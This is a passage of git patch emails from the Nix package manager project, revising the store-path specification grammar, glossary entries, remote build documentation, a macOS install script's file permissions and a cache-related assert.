+      Also note that NAR + SHA-256 must not use this case, and instead must use the `type` = `"source:" ...` case.
 
 [Nix Archive (NAR)]: @docroot@/glossary.md#gloss-NAR
 [sha-256]: https://en.m.wikipedia.org/wiki/SHA-256
 
 ## Historical Note
 
-The `` = `source:...` and `` = `output:out` grammars technically overlap, in that both can represent data hashed by its SHA-256 NAR serialization.
+The `type` = `"source:" ...` and `type` = `"output:out"` grammars technically overlap in purpose,
+in that both can represent data hashed by its SHA-256 NAR serialization.
 
 The original reason for this way of computing names was to prevent name collisions (for security).
 For instance, the thinking was that it shouldn't be feasible to come up with a derivation whose output path collides with the path for a copied source.
-The former would have an `` starting with `output:out:`, while the latter would have an `` starting with `source:`.
+The former would have an `inner-pre` starting with `output:out:`, while the latter would have an `inner-pre` starting with `source:`.
 
 Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separting derivation-produced vs manually-hashed content-addressed data like this was not useful.
 Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).

From 95190e68ed8f6c152f8ba01b2da7baeacb342c0e Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:21:54 -0500
Subject: [PATCH 449/654] =?UTF-8?q?Mention=20the=20use=20of=20Extended=20B?=
 =?UTF-8?q?ackus=E2=80=93Naur=20form?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 doc/manual/src/protocols/store-path.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index d5dec77b5..57da808f9 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -2,6 +2,8 @@
 
 This is the complete specification for how store paths are calculated.
 
+The format of this specification is close to [Extended Backus–Naur form](https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_form), but must deviate for a few things such as hash functions which we treat as bidirectional for specification purposes.
+
 Regular users do *not* need to know this information --- store paths can be treated as black boxes computed from the properties of the store objects they refer to.
 But for those interested in exactly how Nix works, e.g. if they are reimplementing it, this information can be useful.
 

From 30f6b0f9c55407207bd421b9a5446b455acd1e8e Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:22:08 -0500
Subject: [PATCH 450/654] `pre` -> `fingerprint` in store path grammar

As suggested by @roberth in
https://github.com/NixOS/nix/pull/9295#discussion_r1486402040.

Thanks!
---
 doc/manual/src/protocols/store-path.md | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 57da808f9..649bb4c45 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -12,11 +12,11 @@ store-path = store-dir "/" digest "-" name
 ```
 where
 
-- `digest` = base-32 representation of the first 160 bits of a [SHA-256] hash of `pre`
+- `digest` = base-32 representation of the first 160 bits of a [SHA-256] hash of `fingerprint`
 
   Th is :the hash part of the store name
 
-- `pre` = the string
+- `fingerprint` = the string
 
   ```ebnf
   type ":" sha256 ":" inner-digest ":" store ":" name
@@ -57,9 +57,9 @@ where
     `id` is the name of the output (usually, "out").
     For content-addressed store objects, `id`, is always "out".
 
-- `inner-digest` = base-16 representation of a SHA-256 hash of `inner-pre`
+- `inner-digest` = base-16 representation of a SHA-256 hash of `inner-fingerprint`
 
-- `inner-pre` = one of the following based on `type`:
+- `inner-fingerprint` = one of the following based on `type`:
 
   - if `type` = `"text:" ...`:
 
@@ -108,7 +108,7 @@ in that both can represent data hashed by its SHA-256 NAR serialization.
 
 The original reason for this way of computing names was to prevent name collisions (for security).
 For instance, the thinking was that it shouldn't be feasible to come up with a derivation whose output path collides with the path for a copied source.
-The former would have an `inner-pre` starting with `output:out:`, while the latter would have an `inner-pre` starting with `source:`.
+The former would have an `inner-fingerprint` starting with `output:out:`, while the latter would have an `inner-fingerprint` starting with `source:`.
 
 Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separting derivation-produced vs manually-hashed content-addressed data like this was not useful.
 Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).

From 0862d7ce57f7e16cf7f8ded3db7586a20fa8da28 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:26:02 -0500
Subject: [PATCH 451/654] Move around non-terminals

---
 doc/manual/src/protocols/store-path.md | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 649bb4c45..61f9d1604 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -12,9 +12,13 @@ store-path = store-dir "/" digest "-" name
 ```
 where
 
+- `name` = the name of the store object.
+
+- `store-dir` = the [store directory](@docroot@/store/store-path.md#store-directory)
+
 - `digest` = base-32 representation of the first 160 bits of a [SHA-256] hash of `fingerprint`
 
-  Th is :the hash part of the store name
+  This the hash part of the store name
 
 - `fingerprint` = the string
 
@@ -25,10 +29,6 @@ where
   Note that it includes the location of the store as well as the name to make sure that changes to either of those are reflected in the hash
   (e.g. you won't get `/nix/store/-name1` and `/nix/store/-name2`, or `/gnu/store/-name1`, with equal hash parts).
 
-- `name` = the name of the store object.
-
-- `store` = the [store directory](@docroot@/store/store-path.md#store-directory)
-
 - `type` = one of:
 
   - ```ebnf

From 4c3e4d6d7167e4fbd284eb00063882b8442e3e99 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:33:06 -0500
Subject: [PATCH 452/654] Sections, EBNF tweaks

---
 doc/manual/src/protocols/store-path.md | 34 +++++++++++++++++---------
 1 file changed, 22 insertions(+), 12 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 61f9d1604..ff075b3b6 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -7,6 +7,8 @@ The format of this specification is close to [Extended Backus–Naur form](https
 Regular users do *not* need to know this information --- store paths can be treated as black boxes computed from the properties of the store objects they refer to.
 But for those interested in exactly how Nix works, e.g. if they are reimplementing it, this information can be useful.
 
+## Store path proper
+
 ```ebnf
 store-path = store-dir "/" digest "-" name
 ```
@@ -20,10 +22,10 @@ where
 
   This the hash part of the store name
 
-- `fingerprint` = the string
+## Fingerprint
 
-  ```ebnf
-  type ":" sha256 ":" inner-digest ":" store ":" name
+- ```ebnf
+  fingerprint = type ":" sha256 ":" inner-digest ":" store ":" name
   ```
 
   Note that it includes the location of the store as well as the name to make sure that changes to either of those are reflected in the hash
@@ -32,14 +34,14 @@ where
 - `type` = one of:
 
   - ```ebnf
-    "text" ( ":" store-path )*
+    | "text" ( ":" store-path )*
     ```
 
     for encoded derivations written to the store.
     The optional trailing store paths are the references of the store object.
 
   - ```ebnf
-    "source" ( ":" store-path )*
+    | "source" ( ":" store-path )*
     ```
 
     For paths copied to the store and hashed via a [Nix Archive (NAR)] and [SHA-256][sha-256].
@@ -47,7 +49,7 @@ where
     Additionally, we can have an optional `:self` label to denote self reference.
 
   - ```ebnf
-    "output:" id
+    | "output:" id
     ```
 
     For either the outputs built from derivations,
@@ -59,6 +61,8 @@ where
 
 - `inner-digest` = base-16 representation of a SHA-256 hash of `inner-fingerprint`
 
+## Inner fingerprint
+
 - `inner-fingerprint` = one of the following based on `type`:
 
   - if `type` = `"text:" ...`:
@@ -77,8 +81,6 @@ where
 
     - For content-addressed store paths:
 
-      the string
-
       ```ebnf
       "fixed:out:" rec algo ":" hash ":"
       ```
@@ -87,15 +89,23 @@ where
 
       - `rec` = one of:
 
-        - `r:` hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
+        - ```ebnf
+          | "r:"
+          ```
+          hashes of the [Nix Archive (NAR)] (arbitrary file system object) serialization
 
-        - `` (empty string) for hashes of the flat (single file) serialization
+        - ```ebnf
+          |
+          ```
+          (empty string) for hashes of the flat (single file) serialization
 
-      - `algo` = `md5`, `sha1` or `sha256`
+      - ```ebnf
+        algo = "md5" | "sha1" | "sha256"
+        ```
 
       - `hash` = base-16 representation of the path or flat hash of the contents of the path (or expected contents of the path for fixed-output derivations).
 
-      Note that `id` = `out`, regardless of the name part of the store path.
+      Note that `id` = `"out"`, regardless of the name part of the store path.
       Also note that NAR + SHA-256 must not use this case, and instead must use the `type` = `"source:" ...` case.
 
 [Nix Archive (NAR)]: @docroot@/glossary.md#gloss-NAR

From c873a140d711eb1c9f268f0903021bb68e764684 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:34:54 -0500
Subject: [PATCH 453/654] Apply suggestions from code review

Co-authored-by: Robert Hensing 
---
 doc/manual/src/protocols/store-path.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index ff075b3b6..2fc4bf7af 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -120,7 +120,7 @@ The original reason for this way of computing names was to prevent name collisio
 For instance, the thinking was that it shouldn't be feasible to come up with a derivation whose output path collides with the path for a copied source.
 The former would have an `inner-fingerprint` starting with `output:out:`, while the latter would have an `inner-fingerprint` starting with `source:`.
 
-Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separting derivation-produced vs manually-hashed content-addressed data like this was not useful.
+Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separating derivation-produced vs manually-hashed content-addressed data like this was not useful.
 Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).
 This allows freely switching between using [fixed-output derivations](@docroot@/glossary.md#gloss-fixed-output-derivation) for fetching, and fetching out-of-band and then manually adding.
 It also removes the ambiguity from the grammar.

From 5169f5f4d9743fa10a8578625d2c290141949d54 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 12:01:54 -0500
Subject: [PATCH 454/654] Apply suggestions from code review

Co-authored-by: Robert Hensing 
---
 doc/manual/src/protocols/store-path.md | 2 +-
 src/libstore/store-api.cc              | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 2fc4bf7af..1f619e6a2 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -111,7 +111,7 @@ where
 [Nix Archive (NAR)]: @docroot@/glossary.md#gloss-NAR
 [sha-256]: https://en.m.wikipedia.org/wiki/SHA-256
 
-## Historical Note
+### Historical Note
 
 The `type` = `"source:" ...` and `type` = `"output:out"` grammars technically overlap in purpose,
 in that both can represent data hashed by its SHA-256 NAR serialization.
diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc
index 1fb6cdce7..4238cbbf5 100644
--- a/src/libstore/store-api.cc
+++ b/src/libstore/store-api.cc
@@ -69,7 +69,7 @@ StorePath Store::followLinksToStorePath(std::string_view path) const
 The exact specification of store paths is in `protocols/store-path.md`
 in the Nix manual. These few functions implement that specification.
 
-If changes do these functions go behind mere implementation changes but
+If changes to these functions go beyond mere implementation changes i.e.
 also update the user-visible behavior, please update the specification
 to match.
 */

From 898fd1e48d117c7cd28bbc04cd230450f1df9adc Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 12:04:37 -0500
Subject: [PATCH 455/654] Update doc/manual/src/protocols/store-path.md

---
 doc/manual/src/protocols/store-path.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 1f619e6a2..595c7a10e 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -121,6 +121,6 @@ For instance, the thinking was that it shouldn't be feasible to come up with a d
 The former would have an `inner-fingerprint` starting with `output:out:`, while the latter would have an `inner-fingerprint` starting with `source:`.
 
 Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separating derivation-produced vs manually-hashed content-addressed data like this was not useful.
-Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).
+Now, data that is content-addressed with SHA-256 + NAR-serialization always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).
 This allows freely switching between using [fixed-output derivations](@docroot@/glossary.md#gloss-fixed-output-derivation) for fetching, and fetching out-of-band and then manually adding.
 It also removes the ambiguity from the grammar.

From f29d2a9d11c6b1c4cb8011e45dc45d99e4d572bd Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 12:30:28 -0500
Subject: [PATCH 456/654] Small EBNF fix

---
 doc/manual/src/protocols/store-path.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 595c7a10e..fcf8038fc 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -95,11 +95,11 @@ where
           hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
 
         - ```ebnf
-          |
+          | ""
           ```
           (empty string) for hashes of the flat (single file) serialization
 
-      - ```ebf
+      - ```ebnf
         algo = "md5" | "sha1" | "sha256"
         ```
 

From 64cbd4c05a413eae55cde784594472f921fc7367 Mon Sep 17 00:00:00 2001
From: Anton Samokhvalov 
Date: Mon, 12 Feb 2024 23:37:40 +0300
Subject: [PATCH 457/654] Update nar-info-disk-cache.cc

Fix the case where asserts are no-ops, as in release builds.
---
 src/libstore/nar-info-disk-cache.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/nar-info-disk-cache.cc b/src/libstore/nar-info-disk-cache.cc
index 310105c75..07beb8acb 100644
--- a/src/libstore/nar-info-disk-cache.cc
+++ b/src/libstore/nar-info-disk-cache.cc
@@ -209,7 +209,7 @@ public:
 
             {
                 auto r(state->insertCache.use()(uri)(time(0))(storeDir)(wantMassQuery)(priority));
-                assert(r.next());
+                if (!r.next()) { abort(); }
                 ret.id = (int) r.getInt(0);
             }
 

From 64a076fe0678ee46fbec1446df1fcfbb713cfdf6 Mon Sep 17 00:00:00 2001
From: "Travis A. Everett" 
Date: Tue, 13 Feb 2024 01:18:08 -0600
Subject: [PATCH 458/654] install-darwin: fix symbolic perms for install cmd

The symbolic form in use here doesn't seem to have an effect
in either the BSD or coreutils install commands, leaving the
daemon plist with empty permissions. This seems to cause its
own problems.

I think I've got the right symbolic syntax now :)
---
 scripts/install-darwin-multi-user.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/scripts/install-darwin-multi-user.sh b/scripts/install-darwin-multi-user.sh
index 766f81bde..24c9052f9 100644
--- a/scripts/install-darwin-multi-user.sh
+++ b/scripts/install-darwin-multi-user.sh
@@ -102,7 +102,7 @@ poly_extra_try_me_commands() {
 poly_configure_nix_daemon_service() {
     task "Setting up the nix-daemon LaunchDaemon"
     _sudo "to set up the nix-daemon as a LaunchDaemon" \
-          /usr/bin/install -m -rw-r--r-- "/nix/var/nix/profiles/default$NIX_DAEMON_DEST" "$NIX_DAEMON_DEST"
+          /usr/bin/install -m "u=rw,go=r" "/nix/var/nix/profiles/default$NIX_DAEMON_DEST" "$NIX_DAEMON_DEST"
 
     _sudo "to load the LaunchDaemon plist for nix-daemon" \
           launchctl load /Library/LaunchDaemons/org.nixos.nix-daemon.plist

From ce19338f9fa4e8fa1fea7faf33c0f2c384e590dd Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 13:30:17 +0100
Subject: [PATCH 459/654] update glossary entry on store types

the interesting information is on the proper pages, and is now presented
a bit more prominently.

the paragraph was a bit confusing to read, also because an anchor link
to an inline definition was in the middle of the sentence. "local store"
now has its own glossary entry.
---
 doc/manual/src/glossary.md | 23 +++++++++++++----------
 1 file changed, 13 insertions(+), 10 deletions(-)

diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index 13b2906f7..51f1e3a71 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -59,18 +59,21 @@
 
 - [store]{#gloss-store}
 
-  A collection of store objects, with operations to manipulate that collection.
-  See [Nix store](./store/index.md) for details.
+  A collection of [store objects][store object], with operations to manipulate that collection.
+  See [Nix Store](./store/index.md) for details.
 
-  There are many types of stores.
-  See [`nix help-stores`](@docroot@/command-ref/new-cli/nix3-help-stores.md) for a complete list.
-
-  From the perspective of the location where Nix is invoked, the Nix store can be  referred to _local_ or _remote_.
-  Only a [local store]{#gloss-local-store} exposes a location in the file system of the machine where Nix is invoked that allows access to store objects, typically `/nix/store`.
-  Local stores can be used for building [derivations](#gloss-derivation).
-  See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details.
+  There are many types of stores, see [Store Types](./store/types/index.md) for details.
 
   [store]: #gloss-store
+
+- [local store]{#gloss-local-store}
+
+  From the perspective of the location where Nix is invoked, the Nix [store] can be referred to _local_ or _remote_.
+  Only a local store exposes a file system directory, typically `/nix/store`, to allow operating system processes to directly access store objects.
+  Local stores can be used for building [derivations][derivation].
+
+  See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details.
+
   [local store]: #gloss-local-store
 
 - [chroot store]{#gloss-chroot-store}
@@ -87,7 +90,7 @@
 
 - [store path]{#gloss-store-path}
 
-  The location of a [store object](@docroot@/store/index.md#store-object) in the file system, i.e., an immediate child of the Nix store directory.
+  The location of a [store object] in the file system, i.e., an immediate child of the Nix store directory.
 
   > **Example**
   >

From e37d50289509dcac2303bc4de7065879dd58c731 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 13:34:51 +0100
Subject: [PATCH 460/654] add instructions to wipe the substituter lookup cache
 (#9498)

* add instructions to wipe the substituter lookup cache
---
 src/libstore/globals.hh | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh
index 070e252b6..941adba78 100644
--- a/src/libstore/globals.hh
+++ b/src/libstore/globals.hh
@@ -793,10 +793,17 @@ public:
     Setting ttlNegativeNarInfoCache{
         this, 3600, "narinfo-cache-negative-ttl",
         R"(
-          The TTL in seconds for negative lookups. If a store path is queried
-          from a substituter but was not found, there will be a negative
-          lookup cached in the local disk cache database for the specified
-          duration.
+          The TTL in seconds for negative lookups.
+          If a store path is queried from a [substituter](#conf-substituters) but was not found, there will be a negative lookup cached in the local disk cache database for the specified duration.
+
+          Set to `0` to force updating the lookup cache.
+
+          To wipe the lookup cache completely:
+
+          ```shell-session
+          $ rm $HOME/.cache/nix/binary-cache-v*.sqlite*
+          # rm /root/.cache/nix/binary-cache-v*.sqlite*
+          ```
         )"};
 
     Setting ttlPositiveNarInfoCache{

From fd82ba0985aefc2a5498045f0caf16f8b2566cf1 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 14:13:56 +0100
Subject: [PATCH 461/654] extract reference documentation on remote builds
 (#9526)

- move all reference documentation to the `builders` configuration setting
- reword documentation on machine specification, add examples
- disable showing the default value, as it rendered as `@/dummy/machines`, which is wrong
- highlight the examples
- link to the configuration docs for distributed builds
- builder -> build machine

Co-authored-by: Janik H 
---
 doc/manual/redirects.js                       |   2 +-
 .../src/advanced-topics/distributed-builds.md | 101 ++-------------
 doc/manual/src/contributing/hacking.md        |   4 +-
 doc/manual/src/glossary.md                    |   2 +-
 .../src/language/advanced-attributes.md       |   2 +-
 doc/manual/src/language/derivations.md        |   2 +-
 src/libstore/build/derivation-goal.cc         |  10 +-
 src/libstore/build/worker.cc                  |  22 +++-
 src/libstore/globals.hh                       | 118 +++++++++++++++++-
 9 files changed, 152 insertions(+), 111 deletions(-)

diff --git a/doc/manual/redirects.js b/doc/manual/redirects.js
index d04f32b49..27ab1853c 100644
--- a/doc/manual/redirects.js
+++ b/doc/manual/redirects.js
@@ -18,7 +18,7 @@ const redirects = {
     "chap-tuning-cores-and-jobs": "advanced-topics/cores-vs-jobs.html",
     "chap-diff-hook": "advanced-topics/diff-hook.html",
     "check-dirs-are-unregistered": "advanced-topics/diff-hook.html#check-dirs-are-unregistered",
-    "chap-distributed-builds": "advanced-topics/distributed-builds.html",
+    "chap-distributed-builds": "command-ref/conf-file.html#conf-builders",
     "chap-post-build-hook": "advanced-topics/post-build-hook.html",
     "chap-post-build-hook-caveats": "advanced-topics/post-build-hook.html#implementation-caveats",
     "chap-writing-nix-expressions": "language/index.html",
diff --git a/doc/manual/src/advanced-topics/distributed-builds.md b/doc/manual/src/advanced-topics/distributed-builds.md
index 507c5ecb7..52acd039c 100644
--- a/doc/manual/src/advanced-topics/distributed-builds.md
+++ b/doc/manual/src/advanced-topics/distributed-builds.md
@@ -36,16 +36,8 @@ error: cannot connect to 'mac'
 then you need to ensure that the `PATH` of non-interactive login shells
 contains Nix.
 
-> **Warning**
->
-> If you are building via the Nix daemon, it is the Nix daemon user account (that is, `root`) that should have SSH access to a user (not necessarily `root`) on the remote machine.
->
-> If you can’t or don’t want to configure `root` to be able to access the remote machine, you can use a private Nix store instead by passing e.g. `--store ~/my-nix` when running a Nix command from the local machine.
-
-The list of remote machines can be specified on the command line or in
-the Nix configuration file. The former is convenient for testing. For
-example, the following command allows you to build a derivation for
-`x86_64-darwin` on a Linux machine:
+The [list of remote build machines](@docroot@/command-ref/conf-file.md#conf-builders) can be specified on the command line or in the Nix configuration file.
+For example, the following command allows you to build a derivation for `x86_64-darwin` on a Linux machine:
 
 ```console
 $ uname
@@ -60,97 +52,20 @@ $ cat ./result
 Darwin
 ```
 
-It is possible to specify multiple builders separated by a semicolon or
-a newline, e.g.
+It is possible to specify multiple build machines separated by a semicolon or a newline, e.g.
 
 ```console
   --builders 'ssh://mac x86_64-darwin ; ssh://beastie x86_64-freebsd'
 ```
 
-Each machine specification consists of the following elements, separated
-by spaces. Only the first element is required. To leave a field at its
-default, set it to `-`.
-
-1.  The URI of the remote store in the format
-    `ssh://[username@]hostname`, e.g. `ssh://nix@mac` or `ssh://mac`.
-    For backward compatibility, `ssh://` may be omitted. The hostname
-    may be an alias defined in your `~/.ssh/config`.
-
-2.  A comma-separated list of Nix platform type identifiers, such as
-    `x86_64-darwin`. It is possible for a machine to support multiple
-    platform types, e.g., `i686-linux,x86_64-linux`. If omitted, this
-    defaults to the local platform type.
-
-3.  The SSH identity file to be used to log in to the remote machine. If
-    omitted, SSH will use its regular identities.
-
-4.  The maximum number of builds that Nix will execute in parallel on
-    the machine. Typically this should be equal to the number of CPU
-    cores. For instance, the machine `itchy` in the example will execute
-    up to 8 builds in parallel.
-
-5.  The “speed factor”, indicating the relative speed of the machine. If
-    there are multiple machines of the right type, Nix will prefer the
-    fastest, taking load into account.
-
-6.  A comma-separated list of *supported features*. If a derivation has
-    the `requiredSystemFeatures` attribute, then Nix will only perform
-    the derivation on a machine that has the specified features. For
-    instance, the attribute
-
-    ```nix
-    requiredSystemFeatures = [ "kvm" ];
-    ```
-
-    will cause the build to be performed on a machine that has the `kvm`
-    feature.
-
-7.  A comma-separated list of *mandatory features*. A machine will only
-    be used to build a derivation if all of the machine’s mandatory
-    features appear in the derivation’s `requiredSystemFeatures`
-    attribute.
-
-8.  The (base64-encoded) public host key of the remote machine. If omitted, SSH
-    will use its regular known-hosts file. Specifically, the field is calculated
-    via `base64 -w0 /etc/ssh/ssh_host_ed25519_key.pub`.
-
-For example, the machine specification
-
-    nix@scratchy.labs.cs.uu.nl  i686-linux      /home/nix/.ssh/id_scratchy_auto        8 1 kvm
-    nix@itchy.labs.cs.uu.nl     i686-linux      /home/nix/.ssh/id_scratchy_auto        8 2
-    nix@poochie.labs.cs.uu.nl   i686-linux      /home/nix/.ssh/id_scratchy_auto        1 2 kvm benchmark
-
-specifies several machines that can perform `i686-linux` builds.
-However, `poochie` will only do builds that have the attribute
-
-```nix
-requiredSystemFeatures = [ "benchmark" ];
-```
-
-or
-
-```nix
-requiredSystemFeatures = [ "benchmark" "kvm" ];
-```
-
-`itchy` cannot do builds that require `kvm`, but `scratchy` does support
-such builds. For regular builds, `itchy` will be preferred over
-`scratchy` because it has a higher speed factor.
-
-Remote builders can also be configured in `nix.conf`, e.g.
+Remote build machines can also be configured in [`nix.conf`](@docroot@/command-ref/conf-file.md), e.g.
 
     builders = ssh://mac x86_64-darwin ; ssh://beastie x86_64-freebsd
 
-Finally, remote builders can be configured in a separate configuration
-file included in `builders` via the syntax `@file`. For example,
+Finally, remote build machines can be configured in a separate configuration
+file included in `builders` via the syntax `@/path/to/file`. For example,
 
     builders = @/etc/nix/machines
 
-causes the list of machines in `/etc/nix/machines` to be included. (This
-is the default.)
-
-If you want the builders to use caches, you likely want to set the
-option `builders-use-substitutes` in your local `nix.conf`.
-
-To build only on remote builders and disable building on the local
-machine, you can use the option `--max-jobs 0`.
+causes the list of machines in `/etc/nix/machines` to be included.
+(This is the default.)
diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md
index 9e2470859..6c9be3635 100644
--- a/doc/manual/src/contributing/hacking.md
+++ b/doc/manual/src/contributing/hacking.md
@@ -147,10 +147,10 @@ Nix can be built for various platforms, as specified in [`flake.nix`]:
 
 In order to build Nix for a different platform than the one you're currently
 on, you need a way for your current Nix installation to build code for that
-platform. Common solutions include [remote builders] and [binary format emulation]
+platform. Common solutions include [remote build machines] and [binary format emulation]
 (only supported on NixOS).
 
-[remote builders]: ../advanced-topics/distributed-builds.md
+[remote builders]: @docroot@/language/derivations.md#attr-builder
 [binary format emulation]: https://nixos.org/manual/nixos/stable/options.html#opt-boot.binfmt.emulatedSystems
 
 Given such a setup, executing the build only requires selecting the respective attribute.
diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index 13b2906f7..359f727d7 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -37,7 +37,7 @@
   This can be achieved by:
   - Fetching a pre-built [store object] from a [substituter]
   - Running the [`builder`](@docroot@/language/derivations.md#attr-builder) executable as specified in the corresponding [derivation]
-  - Delegating to a [remote builder](@docroot@/advanced-topics/distributed-builds.html) and retrieving the outputs
+  - Delegating to a [remote machine](@docroot@/command-ref/conf-file.md#conf-builders) and retrieving the outputs
   
 
   See [`nix-store --realise`](@docroot@/command-ref/nix-store/realise.md) for a detailed description of the algorithm.
diff --git a/doc/manual/src/language/advanced-attributes.md b/doc/manual/src/language/advanced-attributes.md
index 5a6c00cd4..7306fc182 100644
--- a/doc/manual/src/language/advanced-attributes.md
+++ b/doc/manual/src/language/advanced-attributes.md
@@ -257,7 +257,7 @@ Derivations can declare some infrequently used optional attributes.
     of the environment (typically, a few hundred kilobyte).
 
   - [`preferLocalBuild`]{#adv-attr-preferLocalBuild}\
-    If this attribute is set to `true` and [distributed building is enabled](../advanced-topics/distributed-builds.md), then, if possible, the derivation will be built locally instead of being forwarded to a remote machine.
+    If this attribute is set to `true` and [distributed building is enabled](@docroot@/command-ref/conf-file.md#conf-builders), then, if possible, the derivation will be built locally instead of being forwarded to a remote machine.
     This is useful for derivations that are cheapest to build locally.
 
   - [`allowSubstitutes`]{#adv-attr-allowSubstitutes}\
diff --git a/doc/manual/src/language/derivations.md b/doc/manual/src/language/derivations.md
index cbb30d074..75f824a34 100644
--- a/doc/manual/src/language/derivations.md
+++ b/doc/manual/src/language/derivations.md
@@ -36,7 +36,7 @@ It outputs an attribute set, and produces a [store derivation] as a side effect
   The system type on which the [`builder`](#attr-builder) executable is meant to be run.
 
   A necessary condition for Nix to build derivations locally is that the `system` attribute matches the current [`system` configuration option].
-  It can automatically [build on other platforms](../advanced-topics/distributed-builds.md) by forwarding build requests to other machines.
+  It can automatically [build on other platforms](@docroot@/language/derivations.md#attr-builder) by forwarding build requests to other machines.
 
   [`system` configuration option]: @docroot@/command-ref/conf-file.md#conf-system
 
diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc
index 1b326ee13..29bf2852f 100644
--- a/src/libstore/build/derivation-goal.cc
+++ b/src/libstore/build/derivation-goal.cc
@@ -780,9 +780,13 @@ void DerivationGoal::tryToBuild()
 
 void DerivationGoal::tryLocalBuild() {
     throw Error(
-        "unable to build with a primary store that isn't a local store; "
-        "either pass a different '--store' or enable remote builds."
-        "\nhttps://nixos.org/manual/nix/stable/advanced-topics/distributed-builds.html");
+        R"(
+        Unable to build with a primary store that isn't a local store;
+        either pass a different '--store' or enable remote builds.
+
+        For more information check 'man nix.conf' and search for '/machines'.
+        )"
+    );
 }
 
 
diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc
index d57e22393..3a34f4006 100644
--- a/src/libstore/build/worker.cc
+++ b/src/libstore/build/worker.cc
@@ -331,13 +331,23 @@ void Worker::run(const Goals & _topGoals)
             if (awake.empty() && 0U == settings.maxBuildJobs)
             {
                 if (getMachines().empty())
-                   throw Error("unable to start any build; either increase '--max-jobs' "
-                            "or enable remote builds."
-                            "\nhttps://nixos.org/manual/nix/stable/advanced-topics/distributed-builds.html");
+                   throw Error(
+                        R"(
+                        Unable to start any build;
+                        either increase '--max-jobs' or enable remote builds.
+
+                        For more information run 'man nix.conf' and search for '/machines'.
+                        )"
+                    );
                 else
